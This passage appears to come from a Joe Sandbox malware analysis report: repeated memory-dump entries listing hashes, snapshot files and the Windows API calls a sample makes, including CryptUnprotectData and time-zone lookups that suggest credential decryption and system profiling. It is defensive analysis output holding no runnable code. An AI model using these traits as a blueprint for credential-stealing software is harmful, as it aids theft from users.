                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 83291a4b133f1a44810521b055b3229c340f5a91a61c2b6447a25c928b5e673c
                          • Instruction ID: 47494f05f8b0022e4e692e75ce3ed8f317998b5e9bdc4d7ce45925907992e570
                          • Opcode Fuzzy Hash: 83291a4b133f1a44810521b055b3229c340f5a91a61c2b6447a25c928b5e673c
                          • Instruction Fuzzy Hash: 17110670200208EFDB10CF64D889FBA73A9AF89714F11D448FE598B240DB76E841EB71
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 8a93cd8558a64ece8561a0c04b43fbe8f2269294a23aa0812fd26f59533327df
                          • Instruction ID: 129c905bc1d711d214f83148dd6ac0b9a748e02c9e02ecbbf5f687160fd01a6b
                          • Opcode Fuzzy Hash: 8a93cd8558a64ece8561a0c04b43fbe8f2269294a23aa0812fd26f59533327df
                          • Instruction Fuzzy Hash: 6D11A4B4241208FFEB10CF64D895FAAB7B5FB89700F208058FE159B384C7B6A941CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E00,00000000,?), ref: 00DF79B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF79B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00E00E00,00000000,?), ref: 00DF79C4
                          • wsprintfA.USER32 ref: 00DF79F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: e4e166f3b5a152e8442ba719110141c3bac65a562f58fadca71ee1bc3588b023
                          • Instruction ID: 341fd929aec26f3dcdf41508b6263fbf20f9472329a0ac6c40a84af4f79fbc76
                          • Opcode Fuzzy Hash: e4e166f3b5a152e8442ba719110141c3bac65a562f58fadca71ee1bc3588b023
                          • Instruction Fuzzy Hash: 161115B2A04118EACB249FC9D945BBEB7F8EB4CB11F10425AF645A2684E7795940CBB0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008405A0,00000000,?,00E00E10,00000000,?,00000000,00000000), ref: 00DF7A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008405A0,00000000,?,00E00E10,00000000,?,00000000,00000000,?), ref: 00DF7A7D
                          • wsprintfA.USER32 ref: 00DF7AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 73d8cbc166753137f943fbc8b54b53f8af346b5373a1121081401712dfa0a6d3
                          • Instruction ID: 898ab09815d90c0b4102b7960749e66ad323736eba80725155b604ac406b3079
                          • Opcode Fuzzy Hash: 73d8cbc166753137f943fbc8b54b53f8af346b5373a1121081401712dfa0a6d3
                          • Instruction Fuzzy Hash: 021182B1A45218DFDB208F54DC49FA9B778F704721F114396E60A936C0D7745A40CF50
                          APIs
                          • CoCreateInstance.COMBASE(00DFE118,00000000,00000001,00DFE108,00000000), ref: 00DF3758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00DF37B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 244adc25883f8bcc6f150b77d0aa20ff1d6f798ae32cd0b5023bc18e3971de24
                          • Instruction ID: 5b8ebf536b15b3d36c9e88a9d01025d26e24471ecd6ac5bd044f591e8349a74a
                          • Opcode Fuzzy Hash: 244adc25883f8bcc6f150b77d0aa20ff1d6f798ae32cd0b5023bc18e3971de24
                          • Instruction Fuzzy Hash: 4641E870A00A1C9FDB24DB58CC94BABB7B4BB48702F4181D8E609A7290D771AE85CF60
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                          • LocalFree.KERNEL32(?), ref: 00DE9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 4e0962dbf89243dd8b7f9e89d3c1c6aea24a1372e38a93ad570158714c5850d7
                          • Instruction ID: ded890a50c3e0d701ac369aa400ae10ff0cc151c836653b4c1611b9ee84098c3
                          • Opcode Fuzzy Hash: 4e0962dbf89243dd8b7f9e89d3c1c6aea24a1372e38a93ad570158714c5850d7
                          • Instruction Fuzzy Hash: A41109B8A00209EFCB04DF94D985AAEB7B5FF88300F104598EC15A7350D775AE50CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: aIn~$Xo%
                          • API String ID: 0-3752357015
                          • Opcode ID: 385f87f05f861c3040c77929330a504693d19437706cfbf8baa0eec851051f35
                          • Instruction ID: 444a8ec42d5039d51bea98e0223a3195df7758bbf5dda78b2661bcf599f88aaf
                          • Opcode Fuzzy Hash: 385f87f05f861c3040c77929330a504693d19437706cfbf8baa0eec851051f35
                          • Instruction Fuzzy Hash: BBB2E6F3A0C2049FE304AE2DEC8577ABBE5EB94720F164A3DE6C5C3744E63598058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '6EA$|nz
                          • API String ID: 0-1580316990
                          • Opcode ID: f0f12fdf4d4a31ffb8a21940acff9a2a998dd1534f96326a38666490dd08a74d
                          • Instruction ID: 05e715188e05308fe0965320be4f50e83f38ff5db0823fbbd92d24cb2c10e031
                          • Opcode Fuzzy Hash: f0f12fdf4d4a31ffb8a21940acff9a2a998dd1534f96326a38666490dd08a74d
                          • Instruction Fuzzy Hash: D15127F3B082045FF304AA2CEC8177AB7D6DB94310F16863DEA85D77C4E93998058286
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: v;
                          • API String ID: 0-2572620731
                          • Opcode ID: 0cfe4825db6c8b2e987fb77c9ef72ef7013f7613f2a35a2c48015b6664c18ed1
                          • Instruction ID: a8921cab7836799e956804d7b7c2d76a68dace20d28efe2b120c9a611efc42c1
                          • Opcode Fuzzy Hash: 0cfe4825db6c8b2e987fb77c9ef72ef7013f7613f2a35a2c48015b6664c18ed1
                          • Instruction Fuzzy Hash: BB51D6B2A0D3149FE3006F29ED856BAFBE8EB54760F16893DE6C483700E6355D448797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e81dc1786dc8b1e3efab6ee96a852dda35b4bfef222bad28497dbcebd7ca5264
                          • Instruction ID: 53e2452a2ccc82b25f0a4066bc31a5ebb68259f979a10fbd1e3958a279d176be
                          • Opcode Fuzzy Hash: e81dc1786dc8b1e3efab6ee96a852dda35b4bfef222bad28497dbcebd7ca5264
                          • Instruction Fuzzy Hash: D5C139F390C210ABE3146E29EC9577ABBE9EF54730F2A062DEAC4C3784E5755C018697
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eeba4edd6d716afe910816fd908cb7cad329424f23b254baaf9f361c620f3d4e
                          • Instruction ID: a060c9f0efadbcd9eb4c26ce04c62906904cfdcf2fcb7acbfa5bccb31a651834
                          • Opcode Fuzzy Hash: eeba4edd6d716afe910816fd908cb7cad329424f23b254baaf9f361c620f3d4e
                          • Instruction Fuzzy Hash: 705156F3E181105BE708997CEC953B77799EB94320F1B463DEE99E7784E8399C048286
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1caa4f795ac6dde799315333ff7ef982fac2deb4983b73f2645169a9f9d28fe0
                          • Instruction ID: 36053e5433746a018aafd999401de2c03591cdff9cfe490c29867cc63b8d9c6e
                          • Opcode Fuzzy Hash: 1caa4f795ac6dde799315333ff7ef982fac2deb4983b73f2645169a9f9d28fe0
                          • Instruction Fuzzy Hash: 9E513AF3A182105FE7045A2DECD17BBB7D9EB98320F2A453DEA85D7380D93D5C004696
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e108ed5cad3718f23da74c5ec57d56d206be8eceeef3311ae1ffe63550fbf8b6
                          • Instruction ID: 99c3bac69fc45e664a0bd77d5d504fb07353c7af107d4bf4f6669bc15a9e1280
                          • Opcode Fuzzy Hash: e108ed5cad3718f23da74c5ec57d56d206be8eceeef3311ae1ffe63550fbf8b6
                          • Instruction Fuzzy Hash: F25147F3A183185FE704BE3DDC857AABBD9EB94350F1A063DEAC083384E97554048692
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          Joe Sandbox IDA Plugin
